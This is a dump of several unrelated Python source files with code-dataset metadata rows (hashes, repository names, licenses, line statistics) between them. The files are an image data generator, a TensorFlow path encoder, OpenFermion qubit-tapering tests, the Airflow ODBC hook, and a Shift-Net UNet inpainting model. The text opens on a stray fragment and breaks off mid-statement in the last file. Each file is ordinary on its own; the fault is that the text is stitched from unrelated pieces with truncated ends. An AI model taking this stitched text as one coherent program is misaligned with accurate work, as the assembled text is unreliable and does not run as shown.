launcher_id,
genesis_challenge,
delay_time,
delay_ph,
)
| 39.303944
| 120
| 0.725148
|
9918a6ac176937d502ff62b5bfe1073215f0db3c
| 4,125
|
py
|
Python
|
data_gen/DataGenerator.py
|
Jos3f/Intensity-based-clustering-study
|
fac2cc1ab23e7ebbbf87563deb6c242cbdac374c
|
[
"Unlicense"
] | 2
|
2021-04-13T14:55:45.000Z
|
2021-04-29T01:53:39.000Z
|
data_gen/DataGenerator.py
|
Jos3f/Intensity-based-clustering-study
|
fac2cc1ab23e7ebbbf87563deb6c242cbdac374c
|
[
"Unlicense"
] | null | null | null |
data_gen/DataGenerator.py
|
Jos3f/Intensity-based-clustering-study
|
fac2cc1ab23e7ebbbf87563deb6c242cbdac374c
|
[
"Unlicense"
] | null | null | null |
import os
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
from scipy.ndimage import gaussian_filter
from skimage.draw import circle
import math
class DataGenerator:
def __init__(self, dims, seed=1337):
self.dims = dims
np.random.seed(seed)
self.target = np.array([[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]])
self.target = np.array([[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
self.target = np.ones((24, 24)).astype(int)
def sample_images(self, n=100, targets=300, bound = 0.6, ratio = 0.5, image_dir=None, label_dir=None):
"""
ratio: What ratio of the added circles have low intensity and are not to included in the label
bound: the bound between the values high and low intensity
"""
if image_dir is not None:
if not os.path.exists(image_dir):
os.makedirs(image_dir)
if label_dir is not None:
if not os.path.exists(label_dir):
os.makedirs(label_dir)
images = []
labels = []
for i in range(n):
image, label = self.sample_image(bound,ratio,targets)
# images.append(image)
# labels.append(label)
if image_dir is not None:
im = Image.fromarray(image)
im.save(image_dir + '/' + str(i) + ".tif")
if label_dir is not None:
im = Image.fromarray(label)
im.save(label_dir + '/' + str(i) + ".tif")
return images, labels
pass
def sample_image(self, bound, ratio, targets=300):
generated_label = np.zeros(self.dims).astype(int)
generated_image = np.zeros(self.dims).astype(float)
positions = self._get_random_coordinates(targets, margin=(self.target.shape[0]))
radius=10
for i in range(int(math.floor(targets * ratio))):
x = positions[i][0]
y = positions[i][1]
rr,cc = circle(x,y,radius,generated_label.shape)
generated_label[rr,cc] = 255
generated_image[rr, cc] = np.random.uniform(bound, 1)
for i in range(int(math.floor(targets * ratio)),targets):
x = positions[i][0]
y = positions[i][1]
rr,cc = circle(x,y,radius,generated_label.shape)
generated_image[rr, cc] = np.random.uniform(0.15, bound)
generated_label = generated_label.clip(max=255)
# generated_image = gaussian_filter(generated_image, sigma=2)
generated_image = gaussian_filter(generated_image, sigma=10)
generated_image = generated_image + np.random.normal(0.005, 0.01, generated_image.shape)
generated_image = generated_image.clip(min=0, max=1)
# generated_image = gaussian_filter(generated_label, sigma=2)
generated_image = (generated_image / np.max(generated_image) * 255).astype(int)
# plt.rcParams["figure.figsize"] = (20, 20)
# plt.tight_layout()
# plt.matshow(generated_label)
# plt.show()
#
# plt.matshow(generated_image)
# plt.show()
return np.uint8(generated_image), np.uint8(generated_label)
def _get_random_coordinates(self, num=300, margin=6):
coordinates_x = np.random.choice(self.dims[0] - margin, num)
coordinates_y = np.random.choice(self.dims[1] - margin, num)
coordinates = np.vstack((coordinates_x, coordinates_y)).T
return coordinates
if __name__ == '__main__':
dg = DataGenerator((1024, 1024))
dg.sample_image(bound = 0.6, ratio = 0.5,targets=900)
dg.sample_images(100, targets=300, bound = 0.6, ratio = 0.5, image_dir="images", label_dir="labels")
| 35.869565
| 107
| 0.550303
|
cfd1f3b371a507a60319d50a73825887c67690d0
| 2,339
|
py
|
Python
|
src/path_encoder.py
|
Thuamo/RYANSQL
|
d6c03c07db52cbca76b5b935843a39da90636280
|
[
"Apache-2.0"
] | 21
|
2020-07-10T01:13:29.000Z
|
2021-11-22T08:24:12.000Z
|
src/path_encoder.py
|
Thuamo/RYANSQL
|
d6c03c07db52cbca76b5b935843a39da90636280
|
[
"Apache-2.0"
] | 2
|
2021-10-14T04:54:57.000Z
|
2021-10-14T05:01:10.000Z
|
src/path_encoder.py
|
Thuamo/RYANSQL
|
d6c03c07db52cbca76b5b935843a39da90636280
|
[
"Apache-2.0"
] | 8
|
2020-11-09T04:01:26.000Z
|
2021-12-26T13:29:47.000Z
|
import tensorflow as tf
import sys
sys.path.append( "../../util" )
from networkcomponents import *
from db_meta import *
class PathEncoder:
def __init__( self ):
vec_pathcode = [ PATH_NONE, PATH_UNION, PATH_INTER, PATH_EXCEPT, PATH_WHERE, PATH_HAVING, PATH_PAR ]
self.path_dic = dict()
self.path_dic_rev = dict()
for pidx, p in enumerate( vec_pathcode ):
self.path_dic[ p ] = pidx
self.path_dic_rev[ pidx ] = p
def _initialize_embeddings( self, path_embed_len, regularizer = None ):
print ( "PATH INITEMBED CALLED" )
path_embed = tf.get_variable( name = "path_embed", initializer = variable_initializer, shape = [ len( self.path_dic ), path_embed_len ], trainable = True, regularizer = regularizer, dtype = tf.float32 )
path_pad = tf.constant( 0.0, shape = [ 1, path_embed_len ], dtype = tf.float32 )
self.path_embed = tf.concat( [ path_embed, path_pad ], 0 )
# path_idx: BS X P.
# Returns: BS X D. path encoding.
def get_path_embeddings( self, path_embed_len, \
path_idx, path_mask, \
final_out_dim, scope, \
training, keep_prob = 1.0, regularizer = None ):
with tf.variable_scope( scope ):
self._initialize_embeddings( path_embed_len, regularizer )
batch_size = tf.shape( path_idx )[0]
max_p_len = tf.shape( path_idx )[1]
# 1. Convert to path embed matrix.
p_embed = tf.nn.embedding_lookup( self.path_embed, path_idx )
p_embed = tf.nn.dropout( p_embed, keep_prob )
p_embed = apply_mask( p_embed, path_mask, float( 0.0 ) )
conv1d_filter = tf.get_variable( name = "c1d_filter", initializer = variable_initializer, shape = [ 3, p_embed.get_shape().as_list()[-1], p_embed.get_shape().as_list()[-1]], regularizer = regularizer, dtype = tf.float32 )
p_embed = tf.nn.conv1d( p_embed, conv1d_filter, 1, "SAME" )
p_embed = tf.nn.dropout( p_embed, keep_prob )
p_embed = tf.nn.leaky_relu( p_embed )
p_embed = apply_mask( p_embed, path_mask, float( "-inf" ) )
p_embed = tf.reduce_max( p_embed, 1 )
return p_embed
| 45.862745
| 235
| 0.599401
|
c6d854dd963e8c0d515d89e4f1051d45fd01a5ad
| 15,555
|
py
|
Python
|
src/openfermion/transforms/repconversions/qubit_tapering_from_stabilizer_test.py
|
Emieeel/OpenFermion
|
c19d9667c5970473893f9bc0183556c4cd354dd7
|
[
"Apache-2.0"
] | 1,291
|
2017-09-27T22:00:26.000Z
|
2022-03-25T14:34:50.000Z
|
src/openfermion/transforms/repconversions/qubit_tapering_from_stabilizer_test.py
|
xabomon/OpenFermion
|
8028082805a8e48d9fd179e7616e7df8a256693c
|
[
"Apache-2.0"
] | 521
|
2017-09-27T21:36:17.000Z
|
2022-03-02T12:45:56.000Z
|
src/openfermion/transforms/repconversions/qubit_tapering_from_stabilizer_test.py
|
xabomon/OpenFermion
|
8028082805a8e48d9fd179e7616e7df8a256693c
|
[
"Apache-2.0"
] | 365
|
2017-09-27T21:25:38.000Z
|
2022-03-29T19:28:46.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for qubit_tapering_from_stabilizer model."""
import unittest
import numpy
from openfermion.chem import MolecularData
from openfermion.ops.operators import QubitOperator
from openfermion.transforms.opconversions import (jordan_wigner,
get_fermion_operator)
from openfermion.linalg import eigenspectrum
from openfermion.utils.operator_utils import count_qubits
from openfermion.transforms.repconversions.qubit_tapering_from_stabilizer \
import (StabilizerError, check_commuting_stabilizers,
check_stabilizer_linearity, fix_single_term, _reduce_terms,
_reduce_terms_keep_length, _lookup_term, reduce_number_of_terms,
taper_off_qubits)
def lih_hamiltonian():
"""
Generate test Hamiltonian from LiH.
Args:
None
Return:
hamiltonian: FermionicOperator
spectrum: List of energies.
"""
geometry = [('Li', (0., 0., 0.)), ('H', (0., 0., 1.45))]
active_space_start = 1
active_space_stop = 3
molecule = MolecularData(geometry, 'sto-3g', 1, description="1.45")
molecule.load()
molecular_hamiltonian = molecule.get_molecular_hamiltonian(
occupied_indices=range(active_space_start),
active_indices=range(active_space_start, active_space_stop))
hamiltonian = get_fermion_operator(molecular_hamiltonian)
spectrum = eigenspectrum(hamiltonian)
return hamiltonian, spectrum
class TaperingTest(unittest.TestCase):
"""TaperingTest class."""
def test_function_errors(self):
"""Test error of main function."""
hamiltonian, _ = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
with self.assertRaises(TypeError):
reduce_number_of_terms(operator=1, stabilizers=stab1 + stab2)
with self.assertRaises(TypeError):
reduce_number_of_terms(operator=qubit_hamiltonian, stabilizers=1)
with self.assertRaises(TypeError):
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=stab1 + stab2,
manual_input=True,
fixed_positions=None)
with self.assertRaises(StabilizerError):
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=stab1 + stab2,
manual_input=True,
fixed_positions=[1])
with self.assertRaises(StabilizerError):
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=stab1 + stab2,
manual_input=True,
fixed_positions=[1, 1])
with self.assertRaises(StabilizerError):
# Check Identity as stabilizer error.
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=(stab1 +
QubitOperator(' ', 1.0)))
with self.assertRaises(StabilizerError):
# Check complex coefficient stabilizer error.
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=(stab1 +
QubitOperator('Z0', 1.0j)))
with self.assertRaises(StabilizerError):
# Check linearly-dependent stabilizer error.
reduce_number_of_terms(
operator=qubit_hamiltonian,
stabilizers=(stab1 + QubitOperator('Z0 Z1 Z2 Z3', 1.0) + stab2))
with self.assertRaises(StabilizerError):
# Check anti-commuting stabilizer error.
reduce_number_of_terms(operator=qubit_hamiltonian,
stabilizers=(QubitOperator('X0', 1.0) +
QubitOperator('Y0', 1.0)))
with self.assertRaises(StabilizerError):
# Check linearly-dependent stabilizer error.
_reduce_terms(
terms=qubit_hamiltonian,
stabilizer_list=list(stab1 + QubitOperator('Z0 Z1 Z2 Z3', 1.0) +
stab2),
manual_input=False,
fixed_positions=[])
with self.assertRaises(StabilizerError):
# Check complex coefficient stabilizer error.
_reduce_terms(terms=qubit_hamiltonian,
stabilizer_list=list(stab1 +
QubitOperator('Z0', 1.0j)),
manual_input=False,
fixed_positions=[])
with self.assertRaises(StabilizerError):
# Check linearly-dependent stabilizer error.
par_qop = QubitOperator('Z0 Z1 Z2 Z3', 1.0)
_reduce_terms_keep_length(terms=qubit_hamiltonian,
stabilizer_list=[stab1, par_qop, stab2],
manual_input=False,
fixed_positions=[])
with self.assertRaises(StabilizerError):
# Check complex coefficient stabilizer error.
aux_qop = QubitOperator('Z0', 1.0j)
_reduce_terms_keep_length(terms=qubit_hamiltonian,
stabilizer_list=[stab1, aux_qop],
manual_input=False,
fixed_positions=[])
with self.assertRaises(StabilizerError):
# Test check_commuting_stabilizer function
# Requires a list of QubitOperators one of which
# has an imaginary term.
check_commuting_stabilizers(stabilizer_list=[
QubitOperator('Z0 Z1', 1.0),
QubitOperator('X0', 1j)
],
msg='This test fails.')
with self.assertRaises(StabilizerError):
# Test check_stabilizer_linearity function.
# Requires a list of QUbitOperators one of which is
# the identity.
check_stabilizer_linearity(
[QubitOperator('Z0 Z1', 1.0),
QubitOperator(' ', 1.0)],
msg='This test fails.')
def test_fix_single_term(self):
"""Test fix_single_term function."""
stab2 = QubitOperator('Z1 Z3', -1.0)
test_term = QubitOperator('Z1 Z2')
fix1 = fix_single_term(test_term, 1, 'Z', 'X', stab2)
fix2 = fix_single_term(test_term, 0, 'X', 'X', stab2)
self.assertTrue(fix1 == (test_term * stab2))
self.assertTrue(fix2 == test_term)
def test_lookup_term(self):
"""Test for the auxiliar function _lookup_term."""
# Dummy test where the initial Pauli string is larger than the
# updated one.
start_op = list(QubitOperator('Z0 Z1 Z2 Z3').terms.keys())[0]
updateop1 = QubitOperator('Z0 Z2', -1.0)
updateop2 = list(QubitOperator('Z0 Z1 Z2 Z3').terms.keys())
qop = _lookup_term(start_op, [updateop1], updateop2)
final_op = list(qop.terms.keys())[0]
self.assertLess(len(final_op), len(start_op))
def test_reduce_terms(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_eigenspectrum = eigenspectrum(
reduce_number_of_terms(qubit_hamiltonian, stab1 + stab2))
self.assertAlmostEqual(spectrum[0], red_eigenspectrum[0])
def test_reduce_terms_manual_input(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_eigenspectrum = eigenspectrum(
reduce_number_of_terms(qubit_hamiltonian, [stab1, stab2],
manual_input=True,
fixed_positions=[0, 1]))
self.assertAlmostEqual(spectrum[0], red_eigenspectrum[0])
def test_reduce_terms_maintain_length(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_eigenspectrum = eigenspectrum(
reduce_number_of_terms(qubit_hamiltonian,
stab1 + stab2,
maintain_length=True))
self.assertAlmostEqual(spectrum[0], red_eigenspectrum[0])
def test_reduce_terms_auxiliar_functions(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_ham = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_ham1, _ = _reduce_terms(terms=qubit_ham,
stabilizer_list=[stab1, stab2],
manual_input=False,
fixed_positions=[])
red_ham2, _ = _reduce_terms_keep_length(terms=qubit_ham,
stabilizer_list=[stab1, stab2],
manual_input=False,
fixed_positions=[])
red_eigspct1 = eigenspectrum(red_ham1)
red_eigspct2 = eigenspectrum(red_ham2)
self.assertAlmostEqual(spectrum[0], red_eigspct1[0])
self.assertAlmostEqual(spectrum[0], red_eigspct2[0])
def test_reduce_terms_auxiliar_functions_manual_input(self):
"""Test reduce_terms function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_ham = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
red_ham1, _ = _reduce_terms(terms=qubit_ham,
stabilizer_list=[stab1, stab2],
manual_input=True,
fixed_positions=[0, 1])
red_ham2, _ = _reduce_terms_keep_length(terms=qubit_ham,
stabilizer_list=[stab1, stab2],
manual_input=True,
fixed_positions=[0, 1])
red_eigspct1 = eigenspectrum(red_ham1)
red_eigspct2 = eigenspectrum(red_ham2)
self.assertAlmostEqual(spectrum[0], red_eigspct1[0])
self.assertAlmostEqual(spectrum[0], red_eigspct2[0])
def test_tapering_qubits_manual_input_false(self):
"""Test taper_off_qubits function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
tapered_hamiltonian = taper_off_qubits(operator=qubit_hamiltonian,
stabilizers=[stab1, stab2],
manual_input=False,
fixed_positions=[0, 3])
tapered_spectrum = eigenspectrum(tapered_hamiltonian)
self.assertAlmostEqual(spectrum[0], tapered_spectrum[0])
def test_tapering_qubits_manual_input(self):
"""
Test taper_off_qubits function using LiH Hamiltonian.
Checks different qubits inputs to remove manually.
Test the lowest eigenvalue against the full Hamiltonian,
and the full spectrum between them.
"""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
tapered_ham_0_3 = taper_off_qubits(qubit_hamiltonian, [stab1, stab2],
manual_input=True,
fixed_positions=[0, 3])
tapered_ham_2_1 = taper_off_qubits(qubit_hamiltonian, [stab1, stab2],
manual_input=True,
fixed_positions=[2, 1])
tapered_spectrum_0_3 = eigenspectrum(tapered_ham_0_3)
tapered_spectrum_2_1 = eigenspectrum(tapered_ham_2_1)
self.assertAlmostEqual(spectrum[0], tapered_spectrum_0_3[0])
self.assertAlmostEqual(spectrum[0], tapered_spectrum_2_1[0])
self.assertTrue(
numpy.allclose(tapered_spectrum_0_3, tapered_spectrum_2_1))
def test_tapering_qubits_remove_positions(self):
"""Test taper_off_qubits function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
(tapered_hamiltonian,
positions) = taper_off_qubits(operator=qubit_hamiltonian,
stabilizers=[stab1, stab2],
manual_input=True,
fixed_positions=[0, 3],
output_tapered_positions=True)
tapered_spectrum = eigenspectrum(tapered_hamiltonian)
self.assertAlmostEqual(spectrum[0], tapered_spectrum[0])
self.assertEqual(positions, [0, 3])
def test_tappering_stabilizer_more_qubits(self):
"""Test for stabilizer with more qubits than operator."""
hamiltonian = QubitOperator('Y0 Y1', 1.0)
stab = QubitOperator('X0 X1 X2', -1.0)
num_qubits = max(count_qubits(hamiltonian), count_qubits(stab))
tap_ham = taper_off_qubits(hamiltonian, stab)
num_qubits_tap = count_qubits(tap_ham)
self.assertFalse(num_qubits == num_qubits_tap)
hamiltonian = QubitOperator('X0 X1', 1.0)
stab = QubitOperator('Y0 Y1 Y2', -1.0)
num_qubits = max(count_qubits(hamiltonian), count_qubits(stab))
tap_ham = taper_off_qubits(hamiltonian, stab)
num_qubits_tap = count_qubits(tap_ham)
self.assertFalse(num_qubits == num_qubits_tap)
def test_taper_x_stab(self):
hamiltonian = QubitOperator('X0 X1', 1.0)
stab1 = QubitOperator('Y0 Y2', -1.0)
tham = reduce_number_of_terms(hamiltonian, stab1, maintain_length=True)
self.assertTrue(hamiltonian == tham)
| 44.570201
| 80
| 0.590743
|
09b090a2d2598161f683e6255d10399d40d8d766
| 8,064
|
py
|
Python
|
airflow/providers/odbc/hooks/odbc.py
|
omad/airflow
|
663259d4b541ab10ce55fec4d2460e23917062c2
|
[
"Apache-2.0"
] | 1
|
2021-07-07T15:13:51.000Z
|
2021-07-07T15:13:51.000Z
|
airflow/providers/odbc/hooks/odbc.py
|
omad/airflow
|
663259d4b541ab10ce55fec4d2460e23917062c2
|
[
"Apache-2.0"
] | 1
|
2020-10-15T22:39:05.000Z
|
2020-10-15T22:39:05.000Z
|
airflow/providers/odbc/hooks/odbc.py
|
tanjinP/airflow
|
f0b9aae564805fb09328faf0c47f441ee0699ed8
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=c-extension-no-member
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains ODBC hook."""
from typing import Any, Optional
from urllib.parse import quote_plus
import pyodbc
from airflow.hooks.dbapi_hook import DbApiHook
from airflow.utils.helpers import merge_dicts
class OdbcHook(DbApiHook):
"""
Interact with odbc data sources using pyodbc.
See :ref:`apache-airflow:howto/connection/odbc` for full documentation.
"""
DEFAULT_SQLALCHEMY_SCHEME = 'mssql+pyodbc'
conn_name_attr = 'odbc_conn_id'
default_conn_name = 'odbc_default'
supports_autocommit = True
def __init__(
self,
*args,
database: Optional[str] = None,
driver: Optional[str] = None,
dsn: Optional[str] = None,
connect_kwargs: Optional[dict] = None,
sqlalchemy_scheme: Optional[str] = None,
**kwargs,
) -> None:
"""
:param args: passed to DbApiHook
:param database: database to use -- overrides connection ``schema``
:param driver: name of driver or path to driver. overrides driver supplied in connection ``extra``
:param dsn: name of DSN to use. overrides DSN supplied in connection ``extra``
:param connect_kwargs: keyword arguments passed to ``pyodbc.connect``
:param sqlalchemy_scheme: Scheme sqlalchemy connection. Default is ``mssql+pyodbc`` Only used for
``get_sqlalchemy_engine`` and ``get_sqlalchemy_connection`` methods.
:param kwargs: passed to DbApiHook
"""
super().__init__(*args, **kwargs)
self._database = database
self._driver = driver
self._dsn = dsn
self._conn_str = None
self._sqlalchemy_scheme = sqlalchemy_scheme
self._connection = None
self._connect_kwargs = connect_kwargs
@property
def connection(self):
"""``airflow.Connection`` object with connection id ``odbc_conn_id``"""
if not self._connection:
self._connection = self.get_connection(getattr(self, self.conn_name_attr))
return self._connection
@property
def database(self) -> Optional[str]:
"""Database provided in init if exists; otherwise, ``schema`` from ``Connection`` object."""
return self._database or self.connection.schema
@property
def sqlalchemy_scheme(self) -> Optional[str]:
"""Database provided in init if exists; otherwise, ``schema`` from ``Connection`` object."""
return (
self._sqlalchemy_scheme
or self.connection_extra_lower.get('sqlalchemy_scheme')
or self.DEFAULT_SQLALCHEMY_SCHEME
)
@property
def connection_extra_lower(self) -> dict:
"""
``connection.extra_dejson`` but where keys are converted to lower case.
This is used internally for case-insensitive access of odbc params.
"""
return {k.lower(): v for k, v in self.connection.extra_dejson.items()}
@property
def driver(self) -> Optional[str]:
"""Driver from init param if given; else try to find one in connection extra."""
if not self._driver:
driver = self.connection_extra_lower.get('driver')
if driver:
self._driver = driver
return self._driver and self._driver.strip().lstrip('{').rstrip('}').strip()
@property
def dsn(self) -> Optional[str]:
"""DSN from init param if given; else try to find one in connection extra."""
if not self._dsn:
dsn = self.connection_extra_lower.get('dsn')
if dsn:
self._dsn = dsn.strip()
return self._dsn
@property
def odbc_connection_string(self):
"""
ODBC connection string
We build connection string instead of using ``pyodbc.connect`` params because, for example, there is
no param representing ``ApplicationIntent=ReadOnly``. Any key-value pairs provided in
``Connection.extra`` will be added to the connection string.
"""
if not self._conn_str:
conn_str = ''
if self.driver:
conn_str += f"DRIVER={{{self.driver}}};"
if self.dsn:
conn_str += f"DSN={self.dsn};"
if self.connection.host:
conn_str += f"SERVER={self.connection.host};"
database = self.database or self.connection.schema
if database:
conn_str += f"DATABASE={database};"
if self.connection.login:
conn_str += f"UID={self.connection.login};"
if self.connection.password:
conn_str += f"PWD={self.connection.password};"
if self.connection.port:
f"PORT={self.connection.port};"
extra_exclude = {'driver', 'dsn', 'connect_kwargs', 'sqlalchemy_scheme'}
extra_params = {
k: v for k, v in self.connection.extra_dejson.items() if not k.lower() in extra_exclude
}
for k, v in extra_params.items():
conn_str += f"{k}={v};"
self._conn_str = conn_str
return self._conn_str
@property
def connect_kwargs(self) -> dict:
"""
Returns effective kwargs to be passed to ``pyodbc.connect`` after merging between conn extra,
``connect_kwargs`` and hook init.
Hook ``connect_kwargs`` precedes ``connect_kwargs`` from conn extra.
String values for 'true' and 'false' are converted to bool type.
If ``attrs_before`` provided, keys and values are converted to int, as required by pyodbc.
"""
def clean_bool(val): # pylint: disable=inconsistent-return-statements
if hasattr(val, 'lower'):
if val.lower() == 'true':
return True
elif val.lower() == 'false':
return False
else:
return val
conn_connect_kwargs = self.connection_extra_lower.get('connect_kwargs', {})
hook_connect_kwargs = self._connect_kwargs or {}
merged_connect_kwargs = merge_dicts(conn_connect_kwargs, hook_connect_kwargs)
if 'attrs_before' in merged_connect_kwargs:
merged_connect_kwargs['attrs_before'] = {
int(k): int(v) for k, v in merged_connect_kwargs['attrs_before'].items()
}
return {k: clean_bool(v) for k, v in merged_connect_kwargs.items()}
def get_conn(self) -> pyodbc.Connection:
"""Returns a pyodbc connection object."""
conn = pyodbc.connect(self.odbc_connection_string, **self.connect_kwargs)
return conn
def get_uri(self) -> str:
"""URI invoked in :py:meth:`~airflow.hooks.dbapi_hook.DbApiHook.get_sqlalchemy_engine` method"""
quoted_conn_str = quote_plus(self.odbc_connection_string)
uri = f"{self.sqlalchemy_scheme}:///?odbc_connect={quoted_conn_str}"
return uri
def get_sqlalchemy_connection(
self, connect_kwargs: Optional[dict] = None, engine_kwargs: Optional[dict] = None
) -> Any:
"""Sqlalchemy connection object"""
engine = self.get_sqlalchemy_engine(engine_kwargs=engine_kwargs)
cnx = engine.connect(**(connect_kwargs or {}))
return cnx
| 39.529412
| 108
| 0.635417
|
33b7cb9af97ea021ec16ba64320a5e97d7bc7aec
| 31,792
|
py
|
Python
|
models/modules/shift_unet.py
|
qianbenb/Shift-Net_pytorch
|
c765939bed64b9604e9ea7ce2c14b2b2c69046d4
|
[
"MIT"
] | 1
|
2019-04-24T10:01:29.000Z
|
2019-04-24T10:01:29.000Z
|
models/modules/shift_unet.py
|
qianbenb/Shift-Net_pytorch
|
c765939bed64b9604e9ea7ce2c14b2b2c69046d4
|
[
"MIT"
] | null | null | null |
models/modules/shift_unet.py
|
qianbenb/Shift-Net_pytorch
|
c765939bed64b9604e9ea7ce2c14b2b2c69046d4
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
# For original shift
from models.shift_net.InnerShiftTriple import InnerShiftTriple
from models.shift_net.InnerCos import InnerCos
# For res shift
from models.res_shift_net.innerResShiftTriple import InnerResShiftTriple
# For pixel soft shift
from models.soft_shift_net.innerSoftShiftTriple import InnerSoftShiftTriple
# For patch patch shift
from models.patch_soft_shift.innerPatchSoftShiftTriple import InnerPatchSoftShiftTriple
# For res patch patch shift
from models.res_patch_soft_shift.innerResPatchSoftShiftTriple import InnerResPatchSoftShiftTriple
from .unet import UnetSkipConnectionBlock
from .modules import *
################################### *************************** #####################################
################################### Shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class UnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(UnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = UnetSkipConnectionShiftBlock(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Mention: the TripleBlock differs in `upconv` defination.
# 'cos' means that we add a `innerCos` layer in the block.
class UnetSkipConnectionShiftBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_spectral_norm=False, layer_to_last=3):
super(UnetSkipConnectionShiftBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = InnerShiftTriple(opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
